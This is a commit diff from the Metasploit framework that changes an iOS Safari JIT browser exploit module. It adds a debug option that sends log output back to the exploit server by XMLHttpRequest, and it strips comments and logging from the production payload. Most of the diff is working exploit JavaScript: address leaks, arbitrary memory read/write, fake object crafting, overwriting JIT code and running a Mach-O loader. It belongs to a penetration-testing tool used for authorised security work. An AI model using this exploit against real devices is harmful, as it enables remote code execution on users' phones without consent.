add debug logging to javascript exploit

rapid7 · Jul 30, 2020 · 277d7dc · 277d7dc
1 parent 5566e3b
commit 277d7dc
Showing 1 changed file with 40 additions and 28 deletions.
diff --git a/modules/exploits/apple_ios/browser/safari_jit.rb b/modules/exploits/apple_ios/browser/safari_jit.rb
@@ -50,6 +50,9 @@ def initialize(info = {})
         OptString.new('URIPATH', [ true, 'The URI to use for this exploit.', '/' ])
       ]
     )
+    register_advanced_options([
+      OptBool.new('DEBUG_EXPLOIT', [false, "Show debug information during exploitation", false]),
+    ])
   end
 
   def exploit_js
@@ -102,16 +105,6 @@ def exploit_js
       // 5. We overwrite rwx memory used for jit code and redirect execution
       // to that memory using our arbitrary read/write.
 
-      var log_el = "";
-
-      function log(msg) {
-        log_el += msg + "\\n";
-      }
-
-      function logFinalize() {
-        alert(log_el);
-      }
-
       function main(loader, macho) {
 
         // auxillary arrays to facilitate
@@ -267,19 +260,19 @@ def exploit_js
         function testRW32() {
           var o = [1.1];
 
-          log("--------------- testrw32 -------------");
-          log("len: " + o.length);
+          print("--------------- testrw32 -------------");
+          print("len: " + o.length);
 
           var bfly = read32(addrOf(o)+4);
-          log("bfly: " + bfly.toString(16));
+          print("bfly: " + bfly.toString(16));
 
           var len = read32(bfly-8);
-          log("bfly len: " + len.toString(16));
+          print("bfly len: " + len.toString(16));
           write32(bfly - 8, 0x10);
           var ret = o.length == 0x10;
-          log("len: " + o.length);
+          print("len: " + o.length);
           write32(bfly - 8, 1);
-          log("--------------- testrw32 -------------");
+          print("--------------- testrw32 -------------");
           return ret;
         }
 
@@ -363,8 +356,8 @@ def exploit_js
         structLeaker.rw0_f3 = 1.1;
         structLeaker.rw0_f4 = 1.1;
 
-        log("fakeObjStoreAddr: " + addrOf(fakeObjStore).toString(16));
-        log("structLeaker: " + addrOf(structLeaker).toString(16));
+        print("fakeObjStoreAddr: " + addrOf(fakeObjStore).toString(16));
+        print("structLeaker: " + addrOf(structLeaker).toString(16));
 
         var fakeObjStoreAddr = addrOf(fakeObjStore)
         // m_typeInfo offset within a Structure class is 0x34
@@ -405,7 +398,7 @@ def exploit_js
 
         // get lower 32-bit of a 64-bit float, which is a structure pointer.
         var _7pStructAddr = toHILO(val)[1];
-        log("struct addr: " + _7pStructAddr.toString(16));
+        print("struct addr: " + _7pStructAddr.toString(16));
 
         // now we are going to use the structure to craft an object
         // with properties allowing as read/write access to Uint32Array.
@@ -441,7 +434,7 @@ def exploit_js
 
         // m_executable->m_jitCodeForCall
         var jitCodeForCall = read32(m_executable + 0x14) - 1;
-        log("jit code pointer: " + jitCodeForCall.toString(16));
+        print("jit code pointer: " + jitCodeForCall.toString(16));
 
         // Get JSCell::destroy pointer, and pass it
         // to the code we are going to execute as an argument
@@ -452,7 +445,7 @@ def exploit_js
         // read JSCell::destroy
         var JSCell_destroy = read32(classInfo + 0x10);
 
-        log("JSCell_destroy: " + JSCell_destroy.toString(16));
+        print("JSCell_destroy: " + JSCell_destroy.toString(16));
 
         // overwrite jit code of exec function
         for (var i=0; i<loader.length; i++) {
@@ -468,13 +461,11 @@ def exploit_js
         // places right before the start
         write32(jitCodeForCall-4, JSCell_destroy);
         write32(jitCodeForCall-8, nextBuf);
-        log(nextBuf.toString(16));
-        //logFinalize();
+        print("nextBuf: " + nextBuf.toString(16));
         // start our macho loader
+        print("executing macho...");
         exec(true);
-        alert("no go");
-        logFinalize();
-
+        print("exec returned");
         return;
       }
 
@@ -507,12 +498,18 @@ def exploit_js
         var macho = loadAsUint32Array("macho.b64");
         setTimeout(function() {main(loader, macho);}, 50);
       } catch (e) {
-        alert(e + "\\n" + e.stack);
+        print(e + "\\n" + e.stack);
       }
     JS
   end
 
   def on_request_uri(cli, request)
+    if datastore['DEBUG_EXPLOIT'] && request.uri =~ %r{/print$*}
+      print_status("[*] #{request.body}")
+      send_response(cli, '')
+      return
+    end
+
     print_status("Request #{request.uri} from #{request['User-Agent']}")
     if request.uri.starts_with? '/loader.b64'
       loader_data = exploit_data('CVE-2016-4669', 'loader')
@@ -533,11 +530,26 @@ def on_request_uri(cli, request)
       return
     end
 
+    jscript = exploit_js
+    if datastore['DEBUG_EXPLOIT']
+      debugjs = %Q^
+print = function(arg) {
+  var request = new XMLHttpRequest();
+  request.open("POST", "/print", false);
+  request.send("" + arg);
+};
+^
+      jscript = "#{debugjs}#{jscript}"
+    else
+      jscript.gsub!(/\/\/.*$/, '') # strip comments
+      jscript.gsub!(/^\s*print\s*\(.*?\);\s*$/, '') # strip print(*);
+    end
+
     html = <<~HTML
       <html>
       <body>
       <script>
-      #{exploit_js}
+      #{jscript}
       </script>
       </body>
       </html>